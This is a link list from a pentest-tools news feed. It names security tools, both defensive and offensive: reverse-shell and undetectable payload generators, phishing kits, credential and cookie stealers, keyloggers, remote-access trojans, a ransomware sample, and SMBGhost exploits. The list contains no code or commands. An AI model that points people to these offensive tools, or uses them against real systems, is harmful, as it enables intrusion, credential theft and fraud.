- [Open-Sesame - A Python Tool Which Runs To Display Random Publicly Disclosed Hackerone Reports When Bored](http://feedproxy.google.com/~r/PentestTools/~3/qTuvqxXCKdM/open-sesame-python-tool-which-runs-to.html)
- [Evilreg - Reverse Shell Using Windows Registry Files (.Reg)](http://feedproxy.google.com/~r/PentestTools/~3/kjj-ANfbYac/evilreg-reverse-shell-using-windows.html)
- [URLBrute - Tool To Brute Website Sub-Domains And Dirs](http://feedproxy.google.com/~r/PentestTools/~3/WwP3ztWD7kI/urlbrute-tool-to-brute-website-sub.html)
- [Getdroid - FUD Android Payload And Listener](http://feedproxy.google.com/~r/PentestTools/~3/pG_U-GCs6ws/getdroid-fud-android-payload-and.html)
- [DiscordRAT - Discord Remote Administration Tool Fully Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/4haZwvevBIk/discordrat-discord-remote.html)
- [Lockphish - A Tool For Phishing Attacks On The Lock Screen, Designed To Grab Windows Credentials, Android PIN And iPhone Passcode](http://feedproxy.google.com/~r/PentestTools/~3/Xl9LNG1vR24/lockphish-tool-for-phishing-attacks-on.html)
- [DalFox (Finder Of XSS) - Parameter Analysis And XSS Scanning Tool Based On Golang](http://feedproxy.google.com/~r/PentestTools/~3/suV7iLK-t78/dalfox-finder-of-xss-parameter-analysis.html)
- [Saycheese - Grab Target'S Webcam Shots By Link](http://feedproxy.google.com/~r/PentestTools/~3/62OGo_tCtUY/saycheese-grab-targets-webcam-shots-by.html)
- [Kaiten - A Undetectable Payload Generation](http://feedproxy.google.com/~r/PentestTools/~3/BjGRnyQ2Sy0/kaiten-undetectable-payload-generation.html)
- [Kali Linux 2020.2 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/_hPqKsYoWJU/kali-linux-20202-release-penetration.html)
- [Clipboardme - Grab And Inject Clipboard Content By Link](http://feedproxy.google.com/~r/PentestTools/~3/lo_tZ_nyiFw/clipboardme-grab-and-inject-clipboard.html)
- [Threadtear - Multifunctional Java Deobfuscation Tool Suite](http://feedproxy.google.com/~r/PentestTools/~3/ymCn5kU6UM8/threadtear-multifunctional-java.html)
- [Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack](http://feedproxy.google.com/~r/PentestTools/~3/twbfRGBer8M/wifipumpkin3-powerful-framework-for.html)
- [Catchyou - FUD Win32 Msfvenom Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/7DwqBK8zFmw/catchyou-fud-win32-msfvenom-payload.html)
- [PayloadsAllTheThings - A List Of Useful Payloads And Bypass For Web Application Security And Pentest/CTF](http://feedproxy.google.com/~r/PentestTools/~3/esWjScCVCXc/payloadsallthethings-list-of-useful.html)
- [Exegol - Exegol Is A Kali Light Base With A Few Useful Additional Tools And Some Basic Configuration](http://feedproxy.google.com/~r/PentestTools/~3/Lakc9UAJUp0/exegol-exegol-is-kali-light-base-with.html)
- [GDBFrontend - An Easy, Flexible And Extensionable GUI Debugger](http://feedproxy.google.com/~r/PentestTools/~3/ZMckgKsM1Mw/gdbfrontend-easy-flexible-and.html)
- [Shellerator - Simple CLI Tool For The Generation Of Bind And Reverse Shells In Multiple Languages](http://feedproxy.google.com/~r/PentestTools/~3/Yxf6odBCrlI/shellerator-simple-cli-tool-for.html)
- [Powerob - An On-The-Fly Powershell Script Obfuscator Meant For Red Team Engagements](http://feedproxy.google.com/~r/PentestTools/~3/wRC__6cdnU4/powerob-on-fly-powershell-script.html)
- [How to Set Up a VPN on Kodi in 2 Minutes or Less](http://feedproxy.google.com/~r/PentestTools/~3/Bmh0QLdLiXs/how-to-set-up-vpn-on-kodi-in-2-minutes.html)
- [PowerSploit - A PowerShell Post-Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/I7iN_ojAPg4/powersploit-powershell-post.html)
- [HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host](http://feedproxy.google.com/~r/PentestTools/~3/Mkb94nwUrlY/hivejack-this-tool-can-be-used-during.html)
- [Nexphisher - Advanced Phishing Tool For Linux & Termux](http://feedproxy.google.com/~r/PentestTools/~3/8La5H1VOOps/nexphisher-advanced-phishing-tool-for.html)
- [TorghostNG - Make All Your Internet Traffic Anonymized Through Tor Network](http://feedproxy.google.com/~r/PentestTools/~3/IXpdmsWonmk/torghostng-make-all-your-internet.html)
- [Sshprank - A Fast SSH Mass-Scanner, Login Cracker And Banner Grabber Tool Using The Python-Masscan Module](http://feedproxy.google.com/~r/PentestTools/~3/pjY7fJ0VWak/sshprank-fast-ssh-mass-scanner-login.html)
- [Generator-Burp-Extension - Everything You Need About Burp Extension Generation](http://feedproxy.google.com/~r/PentestTools/~3/4Wp_fXhT3WY/generator-burp-extension-everything-you.html)
- [Parsec - Secure Cloud Framework](http://feedproxy.google.com/~r/PentestTools/~3/QWMGe7bsyQ0/parsec-secure-cloud-framework.html)
- [Invoker - Penetration Testing Utility](http://feedproxy.google.com/~r/PentestTools/~3/HbkkC1vYU9g/invoker-penetration-testing-utility.html)
- [Authelia - The Single Sign-On Multi-Factor Portal For Web Apps](http://feedproxy.google.com/~r/PentestTools/~3/aMqf8CRSScQ/authelia-single-sign-on-multi-factor.html)
- [OSSEM - A Tool To Assess Data Quality](http://feedproxy.google.com/~r/PentestTools/~3/kg6kiSGHGAM/ossem-tool-to-assess-data-quality.html)
- [Klar - Integration Of Clair And Docker Registry](http://feedproxy.google.com/~r/PentestTools/~3/KZqyQRzH2hU/klar-integration-of-clair-and-docker.html)
- [Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.](http://feedproxy.google.com/~r/PentestTools/~3/syBVnMzraTM/powershell-reverse-tcp-powershell.html)
- [INTERCEPT - Policy As Code Static Analysis Auditing](http://feedproxy.google.com/~r/PentestTools/~3/fxwU1SEJOq4/intercept-policy-as-code-static.html)
- [Thoron Framework - Tool To Generate Simple Payloads To Provide Linux TCP Attack](http://feedproxy.google.com/~r/PentestTools/~3/YoPMO_OMeME/thoron-framework-tool-to-generate.html)
- [SkyWrapper - Tool That Helps To Discover Suspicious Creation Forms And Uses Of Temporary Tokens In AWS](http://feedproxy.google.com/~r/PentestTools/~3/w0otGurmXTY/skywrapper-tool-that-helps-to-discover.html)
- [Runtime Mobile Security (RMS) - A Powerful Web Interface That Helps You To Manipulate Android Java Classes And Methods At Runtime](http://feedproxy.google.com/~r/PentestTools/~3/5no21xQboKw/runtime-mobile-security-rms-powerful.html)
- [Elemental - An MITRE ATTACK Threat Library](http://feedproxy.google.com/~r/PentestTools/~3/dQ7RRz4RW7w/elemental-mitre-attack-threat-library.html)
- [ROADtools - The Azure AD Exploration Framework](http://feedproxy.google.com/~r/PentestTools/~3/KZVHzFc3-rQ/roadtools-azure-ad-exploration-framework.html)
- [Terrier - A Image And Container Analysis Tool To Identify And Verify The Presence Of Specific Files According To Their Hashes](http://feedproxy.google.com/~r/PentestTools/~3/nlHfJwbCvx8/terrier-image-and-container-analysis.html)
- [wxHexEditor - Hex Editor / Disk Editor for Huge Files or Devices on Linux, Windows and MacOSX](http://feedproxy.google.com/~r/PentestTools/~3/eFlToOdCc4E/wxhexeditor-hex-editor-disk-editor-for.html)
- [DeathRansom - A Ransomware Developed In Python, With Bypass Technics, For Educational Purposes](http://feedproxy.google.com/~r/PentestTools/~3/M2hXB0YTcjM/deathransom-ransomware-developed-in.html)
- [Nuclei - Nuclei Is A Fast Tool For Configurable Targeted Scanning Based On Templates Offering Massive Extensibility And Ease Of Use](http://feedproxy.google.com/~r/PentestTools/~3/SXw3ZY4bg0w/nuclei-nuclei-is-fast-tool-for.html)
- [Print-My-Shell - Tool To Automate The Process Of Generating Various Reverse Shells](http://feedproxy.google.com/~r/PentestTools/~3/XSgk5ddXB8E/print-my-shell-tool-to-automate-process.html)
- [S3Reverse - The Format Of Various S3 Buckets Is Convert In One Format](http://feedproxy.google.com/~r/PentestTools/~3/YFQI-e9mVbg/s3reverse-format-of-various-s3-buckets_26.html)
- [Pwned - Simple CLI Script To Check If You Have A Password That Has Been Compromised In A Data Breach](http://feedproxy.google.com/~r/PentestTools/~3/HrSDHu1CbE0/pwned-simple-cli-script-to-check-if-you.html)
- [Project iKy v2.5.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/7hKPbEXH2Wo/project-iky-v250-tool-that-collects.html)
- [Should-I-Trust - OSINT Tool To Evaluate The Trustworthiness Of A Company](http://feedproxy.google.com/~r/PentestTools/~3/cOG7bf-y3tc/should-i-trust-osint-tool-to-evaluate.html)
- [Wotop - Web On Top Of Any Protocol](http://feedproxy.google.com/~r/PentestTools/~3/OQsDTFx0gQ4/wotop-web-on-top-of-any-protocol.html)
- [Firebase-Extractor - A Tool Written In Python For Scraping Firebase Data](http://feedproxy.google.com/~r/PentestTools/~3/Ce6aeVUESxQ/firebase-extractor-tool-written-in.html)
- [Lulzbuster - A Very Fast And Smart Web Directory And File Enumeration Tool Written In C](http://feedproxy.google.com/~r/PentestTools/~3/-V1NlPemJo4/lulzbuster-very-fast-and-smart-web.html)
- [Impulse - Impulse Denial-of-service ToolKit](http://feedproxy.google.com/~r/PentestTools/~3/JKv4MZkaeVc/impulse-impulse-denial-of-service.html)
- [Nullscan - A Modular Framework Designed To Chain And Automate Security Tests](http://feedproxy.google.com/~r/PentestTools/~3/t0dl3Bg2Thw/nullscan-modular-framework-designed-to.html)
- [githubFind3r - Fast Command Line Repo/User/Commit Search Tool](http://feedproxy.google.com/~r/PentestTools/~3/lF-_ttdZJ7o/githubfind3r-fast-command-line.html)
- [Httpgrep - Scans HTTP Servers To Find Given Strings In URIs](http://feedproxy.google.com/~r/PentestTools/~3/2Ls5ctqJENo/httpgrep-scans-http-servers-to-find.html)
- [Adamantium-Thief - Decrypt Chromium Based Browsers Passwords, Cookies, Credit Cards, History, Bookmarks](http://feedproxy.google.com/~r/PentestTools/~3/bJRNo4eIwn4/adamantium-thief-decrypt-chromium-based.html)
- [Lk Scraper - An Fully Configurable Linkedin Scrape (Scrape Anything Within Linkedin)](http://feedproxy.google.com/~r/PentestTools/~3/qUnpnFTGG9s/lk-scraper-fully-configurable-linkedin.html)
- [Flux-Keylogger - Modern Javascript Keylogger With Web Panel](http://feedproxy.google.com/~r/PentestTools/~3/BzIhmIH2xro/flux-keylogger-modern-javascript.html)
- [Vulnx v2.0 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS (Wordpress , Joomla , Drupal , Prestashop ...)](http://feedproxy.google.com/~r/PentestTools/~3/5dg9OsMFi5U/vulnx-v20-intelligent-bot-auto-shell.html)
- [Vulnx v2.0 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS {(Wordpress , Joomla , Drupal , Prestashop ...)](http://feedproxy.google.com/~r/PentestTools/~3/5dg9OsMFi5U/vulnx-v20-intelligent-bot-auto-shell.html)
- [goBox - GO Sandbox To Run Untrusted Code](http://feedproxy.google.com/~r/PentestTools/~3/jDUHHp_sSOg/gobox-go-sandbox-to-run-untrusted-code.html)
- [RS256-2-HS256 - JWT Attack To Change The Algorithm RS256 To HS256](http://feedproxy.google.com/~r/PentestTools/~3/YEXpmJ8hs38/rs256-2-hs256-jwt-attack-to-change.html)
- [PEASS - Privilege Escalation Awesome Scripts SUITE](http://feedproxy.google.com/~r/PentestTools/~3/o1Y7kANaUGo/peass-privilege-escalation-awesome.html)
- [Pwndrop - Self-Deployable File Hosting Service For Red Teamers, Allowing To Easily Upload And Share Payloads Over HTTP And WebDAV](http://feedproxy.google.com/~r/PentestTools/~3/GnbqJvaDap4/pwndrop-self-deployable-file-hosting.html)
- [DNSProbe - A Tool Built On Top Of Retryabledns That Allows You To Perform Multiple DNS Queries Of Your Choice With A List Of User Supplied Resolvers](http://feedproxy.google.com/~r/PentestTools/~3/8POWQ5vE9V4/dnsprobe-tool-built-on-top-of.html)
- [Crescendo - A Swift Based, Real Time Event Viewer For macOS - It Utilizes Apple's Endpoint Security Framework](http://feedproxy.google.com/~r/PentestTools/~3/HKuOWu-ZStg/crescendo-swift-based-real-time-event.html)
- [Burp Exporter - A Burp Suite Extension To Copy A Request To The Clipboard As Multiple Programming Languages Functions](http://feedproxy.google.com/~r/PentestTools/~3/V-2SxDRDWZQ/burp-exporter-burp-suite-extension-to.html)
- [crauEmu - An uEmu Extension For Developing And Analyzing Payloads For Code-Reuse Attacks](http://feedproxy.google.com/~r/PentestTools/~3/hGO5Jrd9Rg8/crauemu-uemu-extension-for-developing.html)
- [Htbenum - A Linux Enumeration Script For Hack The Box](http://feedproxy.google.com/~r/PentestTools/~3/YzzKcxzuuXo/htbenum-linux-enumeration-script-for.html)
- [Domained - Multi Tool Subdomain Enumeration](http://feedproxy.google.com/~r/PentestTools/~3/mYk06TN1dls/domained-multi-tool-subdomain.html)
- [Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/q07ZQcB3JQo/lollipopz-data-exfiltration-utility-for.html)
- [Sherloq - An Open-Source Digital Image Forensic Toolset](http://feedproxy.google.com/~r/PentestTools/~3/QURuyiMpcjo/sherloq-open-source-digital-image.html)
- [Inhale - A Malware Analysis And Classification Tool](http://feedproxy.google.com/~r/PentestTools/~3/pe8iJ88NKQg/inhale-malware-analysis-and.html)
- [Privacy Badger - A Browser Extension That Automatically Learns To Block Invisible Trackers](http://feedproxy.google.com/~r/PentestTools/~3/3CIh1vQt_rQ/privacy-badger-browser-extension-that.html)
- [Audix - A PowerShell Tool To Quickly Configure The Windows Event Audit Policies For Security Monitoring](http://feedproxy.google.com/~r/PentestTools/~3/BSvJN-c69AY/audix-powershell-tool-to-quickly.html)
- [Serverless Prey - Serverless Functions For Establishing Reverse Shells To Lambda, Azure Functions, And Google Cloud Functions](http://feedproxy.google.com/~r/PentestTools/~3/CZchtPedoKI/serverless-prey-serverless-functions.html)
- [Lunar - A Lightweight Native DLL Mapping Library That Supports Mapping Directly From Memory](http://feedproxy.google.com/~r/PentestTools/~3/Bkcp5vSarTE/lunar-lightweight-native-dll-mapping.html)
- [Ps-Tools - An Advanced Process Monitoring Toolkit For Offensive Operations](http://feedproxy.google.com/~r/PentestTools/~3/BLIhwDuHHX8/ps-tools-advanced-process-monitoring.html)
- [Eavesarp - Analyze ARP Requests To Identify Intercommunicating Hosts And Stale Network Address Configurations (SNACs)](http://feedproxy.google.com/~r/PentestTools/~3/9mELsauoKH4/eavesarp-analyze-arp-requests-to.html)
- [Richkit - Domain Enrichment Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/0PGfoA_aLmw/richkit-domain-enrichment-toolkit.html)
- [Chromepass - Hacking Chrome Saved Passwords](http://feedproxy.google.com/~r/PentestTools/~3/LHrkQaMkLJk/chromepass-hacking-chrome-saved.html)
- [Tentacle - A POC Vulnerability Verification And Exploit Framework](http://feedproxy.google.com/~r/PentestTools/~3/ayqC3hnuHCA/tentacle-poc-vulnerability-verification.html)
- [Tails 4.5 - Live System to Preserve Your Privacy and Anonymity](http://feedproxy.google.com/~r/PentestTools/~3/qwMQ7S8e_2g/tails-45-live-system-to-preserve-your.html)
- [MSOLSpray - A Password Spraying Tool For Microsoft Online Accounts (Azure/O365)](http://feedproxy.google.com/~r/PentestTools/~3/T0v7baCeJh8/msolspray-password-spraying-tool-for.html)
- [Git-Hound v1.1 - GitHound Pinpoints Exposed API Keys On GitHub Using Pattern Matching, Commit History Searching, And A Unique Result Scoring System](http://feedproxy.google.com/~r/PentestTools/~3/YKTyVyUxJSo/git-hound-v11-githound-pinpoints.html)
- [DNSteal v2.0 - DNS Exfiltration Tool For Stealthily Sending Files Over DNS Requests](http://feedproxy.google.com/~r/PentestTools/~3/w4fv5UMmpBI/dnsteal-v20-dns-exfiltration-tool-for.html)
- [OSSEM - Open Source Security Events Metadata](http://feedproxy.google.com/~r/PentestTools/~3/QrknFUz5uGM/ossem-open-source-security-events.html)
- [Angrgdb - Use Angr Inside GDB - Create An Angr State From The Current Debugger State](http://feedproxy.google.com/~r/PentestTools/~3/LZoLEhOI0SI/angrgdb-use-angr-inside-gdb-create-angr.html)
- [SSHPry v2.0 - Spy and Control os SSH Connected client's TTY](http://feedproxy.google.com/~r/PentestTools/~3/jxn3qFteuOw/sshpry-v20-spy-and-control-os-ssh.html)
- [HikPwn - A Simple Scanner For Hikvision Devices](http://feedproxy.google.com/~r/PentestTools/~3/4bho1oxJ4F8/hikpwn-simple-scanner-for-hikvision.html)
- [Sandcastle - A Python Script For AWS S3 Bucket Enumeration](http://feedproxy.google.com/~r/PentestTools/~3/e2xzlmFDtaE/sandcastle-python-script-for-aws-s3.html)
- [Tweetshell - Multi-thread Twitter BruteForcer In Shell Script](http://feedproxy.google.com/~r/PentestTools/~3/vWpgJ70dlTM/tweetshell-multi-thread-twitter.html)
- [Jackdaw - Tool To Collect All Information In Your Domain And Show You Nice Graphs](http://feedproxy.google.com/~r/PentestTools/~3/KWhYPUcsRW4/jackdaw-tool-to-collect-all-information.html)
- [Frida API Fuzzer - This Experimetal Fuzzer Is Meant To Be Used For API In-Memory Fuzzing](http://feedproxy.google.com/~r/PentestTools/~3/gjVqcWYaBMY/frida-api-fuzzer-this-experimetal.html)
- [DigiTrack - Attacks For $5 Or Less Using Arduino](http://feedproxy.google.com/~r/PentestTools/~3/-JaQuxrhKWc/digitrack-attacks-for-5-or-less-using.html)
- [FProbe - Take A List Of Domains/Subdomains And Probe For Working HTTP/HTTPS Server](http://feedproxy.google.com/~r/PentestTools/~3/8DlFDN6KO7g/fprobe-take-list-of-domainssubdomains.html)
- [MSSQLi-DUET - SQL Injection Script For MSSQL That Extracts Domain Users From An Active Directory Environment Based On RID Bruteforcing](http://feedproxy.google.com/~r/PentestTools/~3/UPnTPlqbDuc/mssqli-duet-sql-injection-script-for.html)
- [Awspx - A Graph-Based Tool For Visualizing Effective Access And Resource Relationships In AWS Environments](http://feedproxy.google.com/~r/PentestTools/~3/S_VHOWSjPYM/awspx-graph-based-tool-for-visualizing.html)
- [Pulsar - Network Footprint Scanner Platform - Discover Domains And Run Your Custom Checks Periodically](http://feedproxy.google.com/~r/PentestTools/~3/MIw_sk1zvbY/pulsar-network-footprint-scanner.html)
- [CVE-2020-0796 - CVE-2020-0796 Pre-Auth POC](http://feedproxy.google.com/~r/PentestTools/~3/TThtUSdWVSs/cve-2020-0796-cve-2020-0796-pre-auth-poc.html)
- [CVE-2020-0796 - Windows SMBv3 LPE Exploit #SMBGhost](http://feedproxy.google.com/~r/PentestTools/~3/6jIOCcTQj9U/cve-2020-0796-windows-smbv3-lpe-exploit.html)
- [R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability](http://feedproxy.google.com/~r/PentestTools/~3/3H4HKWEhCXA/r00kie-kr00kie-poc-exploit-for-cve-2019.html)
- [One-Lin3r v2.1 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More](http://feedproxy.google.com/~r/PentestTools/~3/3sjtI9GtF0c/one-lin3r-v21-gives-you-one-liners-that.html)
- [Project iKy v2.4.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/gp-sptDrrHc/project-iky-v240-tool-that-collects.html)
- [Project iKy v2.4.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/gp-sptDrrHc/project-iky-v240-tool-that-collects.html)
- [SauronEye - Search Tool To Find Specific Files Containing Specific Words, I.E. Files Containing Passwords](http://feedproxy.google.com/~r/PentestTools/~3/MdIzMpFQSvE/sauroneye-search-tool-to-find-specific.html)
- [Webkiller v2.0 - Tool Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/Jkmh9Pbq9ho/webkiller-v20-tool-information-gathering.html)
- [InQL Scanner - A Burp Extension For GraphQL Security Testing](http://feedproxy.google.com/~r/PentestTools/~3/NVOs0V16bM8/inql-scanner-burp-extension-for-graphql.html)
- [Mssqlproxy - A Toolkit Aimed To Perform Lateral Movement In Restricted Environments Through A Compromised Microsoft SQL Server Via Socket Reuse](http://feedproxy.google.com/~r/PentestTools/~3/-Yiqjt_MvUo/mssqlproxy-toolkit-aimed-to-perform.html)
- [ProjectOpal - Stealth Post-Exploitation Framework For Wordpress](http://feedproxy.google.com/~r/PentestTools/~3/bX1FcSaxu5Q/projectopal-stealth-post-exploitation.html)
- [ConEmu - Customizable Windows Terminal With Tabs, Splits, Quake-Style, Hotkeys And More](http://feedproxy.google.com/~r/PentestTools/~3/ta1XP283qPo/conemu-customizable-windows-terminal.html)
- [Tinfoil Chat - Onion-routed, Endpoint Secure Messaging System](http://feedproxy.google.com/~r/PentestTools/~3/z86do2O4OzU/tinfoil-chat-onion-routed-endpoint.html)
- [Tinfoil Chat - Onion-routed, Endpoint Secure Messaging System](http://feedproxy.google.com/~r/PentestTools/~3/z86do2O4OzU/tinfoil-chat-onion-routed-endpoint.html)
- [Ninja - Open Source C2 Server Created For Stealth Red Team Operations](http://feedproxy.google.com/~r/PentestTools/~3/MWgMhafBiNM/ninja-open-source-c2-server-created-for.html)
- [RapidPayload - Metasploit Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/W8bo7CzkDwc/rapidpayload-metasploit-payload.html)
- [Katana - A Python Tool For Google Hacking](http://feedproxy.google.com/~r/PentestTools/~3/tCnTDF-uHjw/katana-python-tool-for-google-hacking.html)
- [Envizon v3.0 - Network Visualization And Vulnerability Management/Reporting](http://feedproxy.google.com/~r/PentestTools/~3/X41oXKd4gkU/envizon-v30-network-visualization-and.html)
- [Zphisher - Automated Phishing Tool](http://feedproxy.google.com/~r/PentestTools/~3/j5xeLa9VQ88/zphisher-automated-phishing-tool.html)
- [XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder](http://feedproxy.google.com/~r/PentestTools/~3/4Q8ciQPdm90/xss-loader-xss-payload-generator-xss.html)
- [Starkiller - A Frontend For PowerShell Empire](http://feedproxy.google.com/~r/PentestTools/~3/elk1Q6oQ6Mo/starkiller-frontend-for-powershell.html)
- [FinalRecon v1.0.2 - OSINT Tool For All-In-One Web Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/3okvQ1-7I50/finalrecon-v102-osint-tool-for-all-in.html)
- [ScoringEngine - Scoring Engine For Red/White/Blue Team Competitions](http://feedproxy.google.com/~r/PentestTools/~3/6nojO49JRLQ/scoringengine-scoring-engine-for.html)
- [Astra - Automated Security Testing For REST API's](http://feedproxy.google.com/~r/PentestTools/~3/hG6EAgiwsNY/astra-automated-security-testing-for.html)
- [HTTPS Everywhere - A Browser Extension That Encrypts Your Communications With Many Websites That Offer HTTPS But Still Allow Unencrypted Connections](http://feedproxy.google.com/~r/PentestTools/~3/paesHNCAgvc/https-everywhere-browser-extension-that.html)
- [uDork - Google Hacking Tool](http://feedproxy.google.com/~r/PentestTools/~3/1dZLaMyTZaw/udork-google-hacking-tool.html)
- [XXExploiter - Tool To Help Exploit XXE Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/W5MJnUs6UJU/xxexploiter-tool-to-help-exploit-xxe.html)
- [Maryam v1.4.0 - Open-source Intelligence(OSINT) Framework](http://feedproxy.google.com/~r/PentestTools/~3/a6fsiOPbEwE/maryam-v140-open-source.html)
- [InstaSave - Python Script To Download Images, Videos & Profile Pictures From Instagram](http://feedproxy.google.com/~r/PentestTools/~3/MkEScdqkcss/instasave-python-script-to-download.html)
- [xShock - Shellshock Exploit](http://feedproxy.google.com/~r/PentestTools/~3/CpqroyrzxeE/xshock-shellshock-exploit.html)
- [Chepy - A Python Lib/Cli Equivalent Of The Awesome CyberChef Tool.](http://feedproxy.google.com/~r/PentestTools/~3/10m1tFD1-VA/chepy-python-libcli-equivalent-of.html)
- [Sshuttle - Transparent Proxy Server That Works As A Poor Man'S VPN. Forwards Over SSH](http://feedproxy.google.com/~r/PentestTools/~3/_Z-rOpqm7NU/sshuttle-transparent-proxy-server-that.html)
- [Lazydocker - The Lazier Way To Manage Everything Docker](http://feedproxy.google.com/~r/PentestTools/~3/m8cMANdPG5I/lazydocker-lazier-way-to-manage.html)
- [Pypykatz - Mimikatz Implementation In Pure Python](http://feedproxy.google.com/~r/PentestTools/~3/5PztilQx0u4/pypykatz-mimikatz-implementation-in.html)
- [Token-Reverser - Word List Generator To Crack Security Tokens](http://feedproxy.google.com/~r/PentestTools/~3/X2bKRiEGktY/token-reverser-word-list-generator-to.html)
- [shuffleDNS - Wrapper Around Massdns Written In Go That Allows You To Enumerate Valid Subdomains](http://feedproxy.google.com/~r/PentestTools/~3/rrx6tcXT4Vg/shuffledns-wrapper-around-massdns.html)
- [AWSGen.py - Generates Permutations, Alterations And Mutations Of AWS S3 Buckets Names](http://feedproxy.google.com/~r/PentestTools/~3/SagQLMEKNHs/awsgenpy-generates-permutations.html)
- [Jeopardize - A Low(Zero) Cost Threat Intelligence & Response Tool Against Phishing Domains](http://feedproxy.google.com/~r/PentestTools/~3/1OfTItxHps8/jeopardize-lowzero-cost-threat.html)
- [TEA - Ssh-Client Worm](http://feedproxy.google.com/~r/PentestTools/~3/F1A172DU-rM/tea-ssh-client-worm.html)
- [Zelos - A Comprehensive Binary Emulation Platform](http://feedproxy.google.com/~r/PentestTools/~3/qKXzoe5Eh0E/zelos-comprehensive-binary-emulation.html)
- [Pickl3 - Windows Active User Credential Phishing Tool](http://feedproxy.google.com/~r/PentestTools/~3/_iEA0MZdCwY/pickl3-windows-active-user-credential.html)
- [Betwixt - Web Debugging Proxy Based On Chrome DevTools Network Panel](http://feedproxy.google.com/~r/PentestTools/~3/l5D0QslTtdA/betwixt-web-debugging-proxy-based-on.html)
- [Dirble - Fast Directory Scanning And Scraping Tool](http://feedproxy.google.com/~r/PentestTools/~3/R3GTkdp1h1Y/dirble-fast-directory-scanning-and.html)
- [Pentest Tools Framework - A Database Of Exploits, Scanners And Tools For Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/Y6MNLlqvjcY/pentest-tools-framework-database-of.html)
- [RedRabbit - Red Team PowerShell Script](http://feedproxy.google.com/~r/PentestTools/~3/lM7n5vczD30/redrabbit-red-team-powershell-script.html)
- [Sifter - A OSINT, Recon And Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/jtvcLi48esc/sifter-osint-recon-and-vulnerability.html)
- [FuzzBench - Fuzzer Benchmarking As A Service](http://feedproxy.google.com/~r/PentestTools/~3/YSLbgTkNe8I/fuzzbench-fuzzer-benchmarking-as-service.html)
- [SSRF Sheriff - A Simple SSRF-testing Sheriff Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/LYrEi0Rzzok/ssrf-sheriff-simple-ssrf-testing.html)
- [Evil SSDP - Spoof SSDP Replies And Create Fake UPnP Devices To Phish For Credentials And NetNTLM Challenge/Response](http://feedproxy.google.com/~r/PentestTools/~3/2_EEUCxHTOg/evil-ssdp-spoof-ssdp-replies-and-create.html)
- [Proton Framework - A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework](http://feedproxy.google.com/~r/PentestTools/~3/iwgsy9fNa_Q/proton-framework-windows-post.html)
- [NTLMRecon - A Tool To Enumerate Information From NTLM Authentication Enabled Web Endpoints](http://feedproxy.google.com/~r/PentestTools/~3/-5fIrhdV5wU/ntlmrecon-tool-to-enumerate-information.html)
- [HoneyBot - Capture, Upload And Analyze Network Traffic](http://feedproxy.google.com/~r/PentestTools/~3/fuF8npyiVbc/honeybot-capture-upload-and-analyze.html)
- [HTTP Asynchronous Reverse Shell - Asynchronous Reverse Shell Using The HTTP Protocol](http://feedproxy.google.com/~r/PentestTools/~3/3KNoIjiuWq8/http-asynchronous-reverse-shell.html)
- [Entropy Toolkit - A Set Of Tools To Exploit Netwave And GoAhead IP Webcams](http://feedproxy.google.com/~r/PentestTools/~3/NNcllHwMmEc/entropy-toolkit-set-of-tools-to-exploit.html)
- [SharpRDP - Remote Desktop Protocol .NET Console Application For Authenticated Command Execution](http://feedproxy.google.com/~r/PentestTools/~3/lFPSF5jJpIc/sharprdp-remote-desktop-protocol-net.html)
- [Ghost Framework - An Android Post Exploitation Framework That Uses An Android Debug Bridge To Remotely Access A n Android Device](http://feedproxy.google.com/~r/PentestTools/~3/PkP7ZK50a2g/ghost-framework-android-post.html)
- [Extended-XSS-Search - Scans For Different Types Of XSS On A List Of URLs](http://feedproxy.google.com/~r/PentestTools/~3/c6DJVlJH-TQ/extended-xss-search-scans-for-different.html)
- [Phonia Toolkit - One Of The Most Advanced Toolkits To Scan Phone Numbers Using Only Free Resources](http://feedproxy.google.com/~r/PentestTools/~3/dEM8uP1mKfM/phonia-toolkit-one-of-most-advanced.html)
- [PrivescCheck - Privilege Escalation Enumeration Script For Windows](http://feedproxy.google.com/~r/PentestTools/~3/bYpS9N5_1u8/privesccheck-privilege-escalation.html)
- [TwitWork - Monitor Twitter Stream](http://feedproxy.google.com/~r/PentestTools/~3/b-cPMo5l19E/twitwork-monitor-twitter-stream.html)
- [XCTR Hacking Tools - All in one tools for Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/b6aWbeWNuv8/xctr-hacking-tools-all-in-one-tools-for.html)
- [WiFi Passview v2.0 - An Open Source Batch Script Based WiFi Passview For Windows!](http://feedproxy.google.com/~r/PentestTools/~3/n6DKUp7nr78/wifi-passview-v20-open-source-batch.html)
- [dnsFookup - DNS Rebinding Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/F41mOliutE4/dnsfookup-dns-rebinding-toolkit.html)
